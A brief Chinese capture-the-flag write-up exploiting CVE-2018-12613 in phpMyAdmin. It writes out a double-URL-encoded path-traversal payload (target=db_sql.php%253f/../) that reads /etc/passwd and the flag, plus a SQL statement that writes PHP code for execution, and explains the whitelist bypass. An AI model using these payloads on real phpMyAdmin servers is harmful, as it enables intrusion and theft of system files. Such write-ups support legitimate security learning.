我起初以为是sql注入
抓包什么都没有
扫描一下吧
全是文件包,找找有没有有用的
没啥用,但是我们还扫到了一个东西
访问phpmuyadmin/index.php
发现什么用
然后我把index.php
搞掉了发现version
CVE-2018-12613
那么我们看看哦
?target=db_sql.php%253f/../
可以执行代码
?target=sql.php?/../../../../../../../../../etc/passwd
成功
sql执行命令
SELECT “<?php phpinfo();?>”
%25的url编码为%
%3f的url编码为?
%253f->?
%253f开始服务器自动解码一次为%3f,然后urldecode函数再解码一次为?
满足漏洞白名单
?target=db_sql.php%253f/../../../../../../../../../../../../../../../flag
我们返回上级目录到根目录就可以得到flag
一直加,反正根目录没有上级目录了